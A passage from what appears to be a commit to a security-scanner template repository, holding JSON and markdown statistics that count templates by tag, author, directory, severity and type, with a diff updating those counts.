r","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"dropbox","count":1},{"name":"zms","count":1},{"name":"nordex","count":1},{"name":"shoppable","count":1},{"name":"dvr","count":1},{"name":"jquery","count":1},{"name":"loqate","count":1},{"name":"moin","count":1},{"name":"contentkeeper","count":1},{"name":"shoretel","count":1},{"name":"azkaban","count":1},{"name":"st","count":1},{"name":"opentsdb","count":1},{"name":"livezilla","count":1},{"name":"cscart","count":1},{"name":"crm","count":1},{"name":"locations","count":1},{"name":"traefik","count":1},{"name":"pulsesecure","count":1},{"name":"ricoh","count":1},{"name":"rocketchat","count":1},{"name":"xdcms","count":1},{"name":"announcekit","count":1},{"name":"mantisbt","count":1},{"name":"jitsi","count":1},{"name":"sarg","count":1},{"name":"pivotaltracker","count":1},{"name":"youtube","count":1},{"name":"diris","count":1},{"name":"netgenie","count":1},{"name":"deviantart","count":1},{"name":"calendarix","count":1},{"name":"clockwatch","count":1},{"name":"floc","count":1},{"name":"find","count":1},{"name":"asana","count":1},{"name":"landrayoa","count":1},{"name":"geutebruck","count":1},{"name":"autocomplete","count":1},{"name":"ueditor","count":1},{"name":"rabbitmq","count":1},{"name":"tensorflow","count":1},{"name":"doh","count":1},{"name":"stem","count":1},{"name":"opensns","count":1},{"name":"nifi","count":1},{"name":"uwsgi","count":1},{"name":"auth","count":1},{"name":"geolocation","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"bookstack","count":1},{"name":"jfrog","count":1},{"name":"plc","count":1},{"name":"vscode","count":1},{"name":"csrfguard","count":1},{"name":"cyberoam","count":1},{"name":"nedi","count":1},{"name":"yealink","count":1},{"name":"centreon","count":1},{"name":"fortinet","count":1},{"name":"hiboss","count":1},{"name":"sourcebans","count":1},{"name":"secmail","count":1},{"name":"fortilogger","count":1},{"name":"feifeicms","count":1},{"name":"mongoshake","count":1},{"name":"smartsense","count":1},{"name":"robomongo","count":1},{"name":"tamronos","count":1},{"name":"achecker","count":1},{"name":"mantis","count":1},{"name":"elevation","count":1},{"name":"xiuno","count":1},{"name":"sceditor","count":1},{"name":"seacms","count":1},{"name":"ewebs","count":1},{"name":"spf","count":1},{"name":"electron","count":1},{"name":"yachtcontrol","count":1},{"name":"circontrorl","count":1},{"name":"pihole","count":1},{"name":"plastic","count":1},{"name":"fcm","count":1},{"name":"mrtg","count":1},{"name":"spring","count":1},{"name":"postmessage","count":1},{"name":"circleci","count":1},{"name":"node-red-dashboard","count":1},{"name":"ssl","count":1},{"name":"moinmoin","count":1},{"name":"krweb","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"nweb2fax","count":1},{"name":"artica","count":1},{"name":"wazuh","count":1},{"name":"metabase","count":1},{"name":"testrail","count":1},{"name":"iceflow","count":1},{"name":"varnish","count":1},{"name":"cors","count":1},{"name":"ambari","count":1},{"name":"pacsone","count":1},{"name":"javamelody","count":1},{"name":"jumpcloud","count":1},{"name":"keenetic","count":1},{"name":"stripe","count":1},{"name":"pgadmin","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"pippoint","count":1},{"name":"cobub","count":1},{"name":"burp","count":1},{"name":"lotuscms","count":1},{"name":"optiLink","count":1},{"name":"aspnuke","count":1},{"name":"pcoip","count":1},{"name":"gogs","count":1},{"name":"gloo","count":1},{"name":"ruby","count":1},{"name":"argussurveillance","count":1},{"name":"buildkite","count":1},{"name":"elfinder","count":1},{"name":"cerebro","count":1},{"name":"blue-ocean","count":1},{"name":"acexy","count":1},{"name":"wildfly","count":1},{"name":"flexbe","count":1},{"name":"gurock","count":1},{"name":"buttercms","count":1},{"name":"minimouse","count":1},{"name":"natemail","count":1},{"name":"dnssec","count":1},{"name":"weglot","count":1},{"name":"cockpit","count":1},{"name":"accela","count":1},{"name":"phalcon","count":1},{"name":"rockethchat","count":1},{"name":"camunda","count":1},{"name":"mysql","count":1},{"name":"exposures","count":1},{"name":"bingmaps","count":1},{"name":"trilithic","count":1},{"name":"maccmsv10","count":1},{"name":"faraday","count":1},{"name":"glances","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"dotnetnuke","count":1},{"name":"wondercms","count":1},{"name":"spip","count":1},{"name":"klog","count":1},{"name":"mdb","count":1},{"name":"redcap","count":1},{"name":"nc2","count":1},{"name":"magicflow","count":1},{"name":"eprints","count":1},{"name":"fortiweb","count":1},{"name":"majordomo2","count":1},{"name":"qdpm","count":1},{"name":"woocommerce","count":1},{"name":"gespage","count":1},{"name":"b2evolution","count":1},{"name":"tenda","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"proftpd","count":1},{"name":"nette","count":1},{"name":"clink-office","count":1},{"name":"speed","count":1},{"name":"simplecrm","count":1},{"name":"cloudinary","count":1},{"name":"jenkin","count":1},{"name":"opencast","count":1},{"name":"servicedesk","count":1},{"name":"cloudron","count":1},{"name":"zzzcms","count":1},{"name":"aura","count":1},{"name":"viewpoint","count":1},{"name":"websvn","count":1},{"name":"terraform","count":1},{"name":"zm","count":1},{"name":"wiki","count":1},{"name":"raspap","count":1},{"name":"panos","count":1},{"name":"nerdgraph","count":1},{"name":"ntopng","count":1},{"name":"zend","count":1},{"name":"novnc","count":1},{"name":"kindeditor","count":1},{"name":"woocomernce","count":1},{"name":"ilo4","count":1},{"name":"lokalise","count":1},{"name":"chinaunicom","count":1},{"name":"clusterengine","count":1},{"name":"iterable","count":1},{"name":"bash","count":1},{"name":"meraki","count":1},{"name":"spectracom","count":1},{"name":"package","count":1},{"name":"avalanche","count":1},{"name":"swagger","count":1},{"name":"limit","count":1},{"name":"route","count":1},{"name":"codemeter","count":1},{"name":"luftguitar","count":1},{"name":"nexusdb","count":1},{"name":"scimono","count":1},{"name":"pendo","count":1},{"name":"bolt","count":1},{"name":"netrc","count":1},{"name":"opensmtpd","count":1},{"name":"perl","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"travis","count":1},{"name":"etouch","count":1},{"name":"oidc","count":1},{"name":"cves2001","count":1},{"name":"wmt","count":1},{"name":"dotclear","count":1},{"name":"hubspot","count":1},{"name":"wakatime","count":1},{"name":"starttls","count":1},{"name":"kafdrop","count":1},{"name":"froxlor","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"lansweeper","count":1},{"name":"ognl","count":1},{"name":"qvisdvr","count":1},{"name":"solarlog","count":1},{"name":"h3c-imc","count":1},{"name":"mongo","count":1},{"name":"thinkadmin","count":1},{"name":"netmask","count":1},{"name":"instagram","count":1},{"name":"discourse","count":1},{"name":"graph","count":1},{"name":"grails","count":1},{"name":"openweather","count":1},{"name":"netdata","count":1},{"name":"ruckus","count":1},{"name":"domxss","count":1},{"name":"processmaker","count":1},{"name":"matrix","count":1},{"name":"javafaces","count":1},{"name":"ns","count":1},{"name":"xvr","count":1},{"name":"pmb","count":1},{"name":"dvwa","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"exacqvision","count":1},{"name":"jeewms","count":1},{"name":"smi","count":1},{"name":"craftcms","count":1},{"name":"mautic","count":1},{"name":"svnserve","count":1},{"name":"miscrsoft","count":1},{"name":"lg-nas","count":1},{"name":"rmi","count":1},{"name":"resourcespace","count":1},{"name":"hadoop","count":1},{"name":"spidercontrol","count":1},{"name":"fiori","count":1},{"name":"openrestry","count":1},{"name":"sophos","count":1},{"name":"alertmanager","count":1},{"name":"razor","count":1},{"name":"darkstat","count":1},{"name":"sql","count":1},{"name":"cocoon","count":1},{"name":"cloud","count":1},{"name":"cgi","count":1},{"name":"commscope","count":1},{"name":"fortigate","count":1},{"name":"mapbox","count":1},{"name":"geocode","count":1},{"name":"distance","count":1},{"name":"anchorcms","count":1},{"name":"zte","count":1},{"name":"appweb","count":1},{"name":"cve2006","count":1},{"name":"database","count":1},{"name":"sonarcloud","count":1},{"name":"tcexam","count":1},{"name":"fastcgi","count":1},{"name":"bazarr","count":1},{"name":"skywalking","count":1},{"name":"nuxeo","count":1},{"name":"csrf","count":1},{"name":"frontpage","count":1},{"name":"xunchi","count":1},{"name":"codeigniter","count":1},{"name":"powercreator","count":1},{"name":"panasonic","count":1},{"name":"wamp","count":1},{"name":"twitter","count":1},{"name":"nps","count":1},{"name":"viewlinc","count":1},{"name":"opm","count":1},{"name":"erp-nc","count":1},{"name":"actuator","count":1},{"name":"key","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"zmanda","count":1},{"name":"rhymix","count":1},{"name":"jenzabar","count":1},{"name":"omi","count":1},{"name":"asus","count":1},{"name":"metinfo","count":1},{"name":"empirecms","count":1},{"name":"remkon","count":1},{"name":"servicenow","count":1},{"name":"drone","count":1},{"name":"calendly","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"wooyun","count":1},{"name":"graylog","count":1},{"name":"goahead","count":1},{"name":"lighttpd","count":1},{"name":"soar","count":1},{"name":"tugboat","count":1},{"name":"gunicorn","count":1},{"name":"manager","count":1},{"name":"turbocrm","count":1},{"name":"blackboard","count":1},{"name":"myucms","count":1},{"name":"monitorr","count":1},{"name":"triconsole","count":1},{"name":"phpinfo","count":1},{"name":"mailgun","count":1},{"name":"hortonworks","count":1},{"name":"api-manager","count":1},{"name":"kubeflow","count":1},{"name":"xmlchart","count":1},{"name":"nimble","count":1},{"name":"vnc","count":1},{"name":"office365","count":1},{"name":"huijietong","count":1},{"name":"smartblog","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"socomec","count":1},{"name":"svn","count":1},{"name":"vsftpd","count":1},{"name":"pagespeed","count":1},{"name":"synnefo","count":1},{"name":"expose","count":1},{"name":"nearby","count":1},{"name":"openerp","count":1},{"name":"rsyncd","count":1},{"name":"bing","count":1},{"name":"okta","count":1},{"name":"zeroshell","count":1},{"name":"wing-ftp","count":1},{"name":"websphere","count":1},{"name":"sco","count":1},{"name":"clickhouse","count":1},{"name":"visualstudio","count":1},{"name":"zcms","count":1},{"name":"kerbynet","count":1},{"name":"olivetti","count":1},{"name":"eg","count":1},{"name":"alerta","count":1},{"name":"expressjs","count":1},{"name":"primetek","count":1},{"name":"basic-auth","count":1},{"name":"plugin","count":1},{"name":"parentlink","count":1},{"name":"selea","count":1},{"name":"tracer","count":1},{"name":"nomad","count":1},{"name":"wavemaker","count":1},{"name":"messaging","count":1},{"name":"owa","count":1},{"name":"74cms","count":1},{"name":"postgres","count":1},{"name":"adb","count":1},{"name":"postmark","count":1},{"name":"redis","count":1},{"name":"tinypng","count":1}],"authors":[{"name":"daffainfo","count":285},{"name":"pikpikcu","count":279},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":201},{"name":"geeknik","count":159},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":64},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":46},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"lu4nx","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"sullo","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"unstabl3","count":3},{"name":"fyoorer","count":3},{"name":"sushantkamble","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"shifacyclewala","count":3},{"name":"idealphase","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"0xelkomy","count":2},{"name":"swissky","count":2},{"name":"foulenzer","count":2},{"name":"johnjhacking","count":2},{"name":"sy3omda","count":2},{"name":"huowuzhao","count":2},{"name":"nkxxkn","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"socketz","count":2},{"name":"0xprial","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"gevakun","count":2},{"name":"g4l1t0","count":2},{"name":"davidmckennirey","count":2},{"name":"arcc","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"r12w4n","count":2},{"name":"alifathi-h1","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"hetroublemakr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bsysop","count":2},{"name":"me9187","count":2},{"name":"r3naissance","count":2},{"name":"bernardofsr","count":2},{"name":"kiblyn11","count":2},{"name":"0xsapra","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"gal nagli","count":2},{"name":"koti2","count":2},{"name":"0xsmiley","count":2},{"name":"convisoappsec","count":2},{"name":"random-robbie","count":2},{"name":"x1m_martijn","count":2},{"name":"randomrobbie","count":2},{"name":"whoever","count":2},{"name":"bing0o","count":2},{"name":"afaq","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"bp0lr","count":2},{"name":"cocxanh","count":2},{"name":"w4cky_","count":2},{"name":"amsda","count":2},{"name":"vavkamil","count":2},{"name":"elouhi","count":1},{"name":"yashanand155","count":1},{"name":"hakluke","count":1},{"name":"sickwell","count":1},{"name":"ipanda","count":1},{"name":"soyelmago","count":1},{"name":"mass0ma","count":1},{"name":"elmahdi","count":1},{"name":"udyz","count":1},{"name":"jteles","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"furkansenan","count":1},{"name":"ilovebinbash","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ringo","count":1},{"name":"52971","count":1},{"name":"lark lab","count":1},{"name":"nerrorsec","count":1},{"name":"infosecsanyam","count":1},{"name":"daviey","count":1},{"name":"xstp","count":1},{"name":"nvn1729","count":1},{"name":"shifacyclewla","count":1},{"name":"kareemse1im","count":1},{"name":"elder tao","count":1},{"name":"naglinagli","count":1},{"name":"undefl0w","count":1},{"name":"petruknisme","count":1},{"name":"jrolf","count":1},{"name":"pratik khalane","count":1},{"name":"kurohost","count":1},{"name":"sec_hawk","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"taielab","count":1},{"name":"mhdsamx","count":1},{"name":"apt-mirror","count":1},{"name":"s1r1u5_","count":1},{"name":"aresx","count":1},{"name":"0xrod","count":1},{"name":"patralos","count":1},{"name":"kabirsuda","count":1},{"name":"adrianmf","count":1},{"name":"toufik airane","count":1},{"name":"blckraven","count":1},{"name":"pdp","count":1},{"name":"remonsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"divya_mudgal","count":1},{"name":"evolutionsec","count":1},{"name":"nytr0gen","count":1},{"name":"retr0","count":1},{"name":"akash.c","count":1},{"name":"forgedhallpass","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sicksec","count":1},{"name":"rojanrijal","count":1},{"name":"revblock","count":1},{"name":"zandros0","count":1},{"name":"jeya seelan","count":1},{"name":"tim_koopmans","count":1},{"name":"defr0ggy","count":1},{"name":"_harleo","count":1},{"name":"push4d","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"vzamanillo","count":1},{"name":"ldionmarcil","count":1},{"name":"omarkurt","count":1},{"name":"whynotke","count":1},{"name":"c3l3si4n","count":1},{"name":"willd96","count":1},{"name":"clarkvoss","count":1},{"name":"smaranchand","count":1},{"name":"0xteles","count":1},{"name":"co0nan","count":1},{"name":"brabbit10","count":1},{"name":"un-fmunozs","count":1},{"name":"geraldino2","count":1},{"name":"schniggie","count":1},{"name":"yashgoti","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"b4uh0lz","count":1},{"name":"andirrahmani1","count":1},{"name":"gboddin","count":1},{"name":"ahmetpergamum","count":1},{"name":"becivells","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shelld3v","count":1},{"name":"mesaglio","count":1},{"name":"th3.d1p4k","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bjhulst","count":1},{"name":"_c0wb0y_","count":1},{"name":"qlkwej","count":1},{"name":"0h1in9e","count":1},{"name":"bad5ect0r","count":1},{"name":"alperenkesk","count":1},{"name":"notsoevilweasel","count":1},{"name":"chron0x","count":1},{"name":"cookiehanhoan","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"iampritam","count":1},{"name":"x6263","count":1},{"name":"kre80r","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"zhenwarx","count":1},{"name":"makyotox","count":1},{"name":"ohlinge","count":1},{"name":"andysvints","count":1},{"name":"ajaysenr","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"streetofhackerr007","count":1},{"name":"oscarintherocks","count":1},{"name":"micha3lb3n","count":1},{"name":"fopina","count":1},{"name":"b0rn2r00t","count":1},{"name":"droberson","count":1},{"name":"thevillagehacker","count":1},{"name":"j33n1k4","count":1},{"name":"raesene","count":1},{"name":"intx0x80","count":1},{"name":"bolli95","count":1},{"name":"luci","count":1},{"name":"mubassirpatel","count":1},{"name":"borna nematzadeh","count":1},{"name":"manuelbua","count":1},{"name":"ooooooo_q","count":1},{"name":"berkdusunur","count":1},{"name":"luskabol","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"regala_","count":1},{"name":"alph4byt3","count":1},{"name":"deena","count":1},{"name":"thebinitghimire","count":1},{"name":"thezakman","count":1},{"name":"rotemreiss","count":1},{"name":"its0x08","count":1},{"name":"knassar702","count":1},{"name":"juicypotato1","count":1},{"name":"rodnt","count":1},{"name":"izn0u","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hanlaomo","count":1},{"name":"d0rkerdevil","count":1},{"name":"shreyapohekar","count":1},{"name":"exploitation","count":1},{"name":"philippdelteil","count":1},{"name":"affix","count":1},{"name":"absshax","count":1},{"name":"0xtavian","count":1},{"name":"alex","count":1},{"name":"b0yd","count":1},{"name":"fmunozs","count":1},{"name":"ahmed sherif","count":1},{"name":"_darrenmartyn","count":1},{"name":"yavolo","count":1},{"name":"mah3sec_","count":1}],"directory":[{"name":"cves","count":821},{"name":"vulnerabilities","count":316},{"name":"exposed-panels","count":255},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":137},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":58},{"name":"file","count":49},{"name":"workflows","count":37},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":733},{"name":"high","count":632},{"name":"medium","count":471},{"name":"critical","count":284},{"name":"low","count":155}],"types":[{"name":"http","count":2164},{"name":"file","count":49},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ab911768d1..49c6906b75 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,916 +1,917 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | -| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | -| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | -| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | -| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | -| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | -| cve2021 | 147 | madrobot | 61 | workflows | 37 | | | | | -| joomla | 128 | 0x_akoko | 44 | network | 32 | | | | | -| cve2010 | 109 | gaurang | 42 | iot | 26 | | | | | +| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | +| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | +| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | +| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | +| cve2021 | 151 | zzeitlin | 63 | workflows | 37 | | | | | +| joomla | 128 | 0x_akoko | 46 | network | 32 | | | | | +| cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 27 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 87 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 71 | pr3r00t | 15 | cnvd | 9 | | | | | -| takeover | 69 | sheikhrishad | 15 | headless | 5 | | | | | -| iot | 67 | milo2012 | 14 | | | | | | | -| token | 66 | techbrunchfr | 13 | | | | | | | -| default-login | 65 | suman_kar | 12 | | | | | | | -| token-spray | 63 | cyllective | 11 | | | | | | | -| oob | 59 | r3dg33k | 11 | | | | | | | -| cve2017 | 50 | wdahlenb | 10 | | | | | | | -| file | 48 | random_robbie | 10 | | | | | | | -| unauth | 47 | nadino | 10 | | | | | | | +| apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | +| takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | +| iot | 68 | milo2012 | 14 | | | | | | | +| token | 67 | techbrunchfr | 13 | | | | | | | +| default-login | 66 | suman_kar | 12 | | | | | | | +| token-spray | 63 | r3dg33k | 11 | | | | | | | +| oob | 59 | cyllective | 11 | | | | | | | +| cve2017 | 50 | random_robbie | 10 | | | | | | | +| file | 49 | nadino | 10 | | | | | | | +| unauth | 47 | wdahlenb | 10 | | | | | | | | network | 43 | righettod | 10 | | | | | | | -| ssrf | 40 | melbadry9 | 10 | | | | | | | -| sqli | 40 | hackergautam | 9 | | | | | | | -| | 37 | that_juan_ | 8 | | | | | | | -| cve2016 | 37 | aashiq | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 35 | dr_set | 7 | | | | | | | -| logs | 30 | kophjager007 | 7 | | | | | | | -| google | 29 | oppsec | 7 | | | | | | | -| jira | 28 | randomstr1ng | 7 | | | | | | | -| cve2014 | 27 | meme-lord | 7 | | | | | | | -| listing | 27 | dogasantos | 7 | | | | | | | -| atlassian | 27 | harshbothra_ | 7 | | | | | | | -| cve2015 | 26 | techryptic (@tech) | 7 | | | | | | | -| generic | 24 | emadshanab | 7 | | | | | | | -| auth-bypass | 23 | 0x240x23elu | 7 | | | | | | | -| misc | 23 | pentest_swissky | 6 | | | | | | | -| disclosure | 23 | __fazal | 6 | | | | | | | +| sqli | 40 | melbadry9 | 10 | | | | | | | +| ssrf | 40 | hackergautam | 9 | | | | | | | +| redirect | 37 | that_juan_ | 8 | | | | | | | +| cve2016 | 37 | iamthefrogy | 8 | | | | | | | +| | 37 | aashiq | 8 | | | | | | | +| oracle | 36 | dogasantos | 7 | | | | | | | +| logs | 30 | harshbothra_ | 7 | | | | | | | +| google | 29 | techryptic (@tech) | 7 | | | | | | | +| jira | 28 | meme-lord | 7 | | | | | | | +| atlassian | 27 | randomstr1ng | 7 | | | | | | | +| listing | 27 | emadshanab | 7 | | | | | | | +| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 26 | kophjager007 | 7 | | | | | | | +| generic | 24 | oppsec | 7 | | | | | | | +| disclosure | 23 | dr_set | 7 | | | | | | | +| misc | 23 | __fazal | 6 | | | | | | | +| auth-bypass | 23 | puzzlepeaches | 6 | | | | | | | | cisco | 22 | logicalhunter | 6 | | | | | | | | router | 21 | caspergn | 6 | | | | | | | -| misconfig | 19 | puzzlepeaches | 6 | | | | | | | -| aem | 19 | lu4nx | 5 | | | | | | | -| debug | 18 | joanbono | 5 | | | | | | | -| springboot | 18 | ganofins | 5 | | | | | | | -| cve2012 | 18 | elsfa7110 | 5 | | | | | | | +| misconfig | 20 | pentest_swissky | 6 | | | | | | | +| aem | 19 | yanyun | 5 | | | | | | | +| debug | 18 | ganofins | 5 | | | | | | | +| springboot | 18 | rootxharsh | 5 | | | | | | | +| cve2012 | 18 | joanbono | 5 | | | | | | | | sap | 18 | johnk3r | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | +| php | 16 | iamnoooob | 5 | | | | | | | | cve2011 | 15 | xelkomy | 5 | | | | | | | -| cve2009 | 14 | iamnoooob | 5 | | | | | | | -| struts | 14 | panch0r3d | 5 | | | | | | | -| fuzz | 14 | yanyun | 5 | | | | | | | -| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| fuzz | 14 | panch0r3d | 5 | | | | | | | +| cve2009 | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | elsfa7110 | 5 | | | | | | | +| aws | 14 | e_schultze_ | 4 | | | | | | | | login | 14 | nodauf | 4 | | | | | | | -| weblogic | 14 | e_schultze_ | 4 | | | | | | | -| zoho | 13 | skeltavik | 3 | | | | | | | -| dns | 13 | idealphase | 3 | | | | | | | -| devops | 13 | fyoorer | 3 | | | | | | | -| adobe | 13 | z3bd | 3 | | | | | | | -| android | 13 | yash anand @yashanand155 | 3 | | | | | | | -| jenkins | 12 | binaryfigments | 3 | | | | | | | -| manageengine | 12 | mavericknerd | 3 | | | | | | | -| dlink | 12 | dudez | 3 | | | | | | | -| cve2013 | 11 | shine | 3 | | | | | | | -| wp-theme | 11 | f1tz | 3 | | | | | | | -| dell | 10 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | impramodsargar | 3 | | | | | | | -| xxe | 10 | incogbyte | 3 | | | | | | | -| vmware | 9 | sullo | 3 | | | | | | | -| ftp | 9 | jarijaas | 3 | | | | | | | -| magento | 9 | vsh00t | 3 | | | | | | | -| rails | 8 | sushantkamble | 3 | | | | | | | -| ibm | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | 0w4ys | 3 | | | | | | | -| cnvd | 8 | tess | 3 | | | | | | | -| ruijie | 8 | unstabl3 | 3 | | | | | | | -| nginx | 8 | shifacyclewala | 3 | | | | | | | -| airflow | 8 | emenalf | 3 | | | | | | | -| microsoft | 8 | amsda | 2 | | | | | | | -| backup | 8 | udit_thakkur | 2 | | | | | | | -| cve2008 | 8 | ree4pwn | 2 | | | | | | | -| scada | 8 | randomrobbie | 2 | | | | | | | -| files | 7 | w4cky_ | 2 | | | | | | | -| cms | 7 | 0xsapra | 2 | | | | | | | -| coldfusion | 7 | whoever | 2 | | | | | | | -| netgear | 7 | davidmckennirey | 2 | | | | | | | -| hp | 7 | fabaff | 2 | | | | | | | -| confluence | 7 | 0xsmiley | 2 | | | | | | | -| kubernetes | 7 | r12w4n | 2 | | | | | | | -| rconfig | 6 | kiblyn11 | 2 | | | | | | | -| jetty | 6 | convisoappsec | 2 | | | | | | | -| api | 6 | gal nagli | 2 | | | | | | | -| fileupload | 6 | bernardofsr | 2 | | | | | | | -| nodejs | 6 | swissky | 2 | | | | | | | -| laravel | 6 | x1m_martijn | 2 | | | | | | | -| camera | 6 | cocxanh | 2 | | | | | | | -| solr | 6 | bsysop | 2 | | | | | | | -| docker | 6 | hetroublemakr | 2 | | | | | | | -| citrix | 6 | 0xprial | 2 | | | | | | | -| django | 6 | vavkamil | 2 | | | | | | | -| circarlife | 5 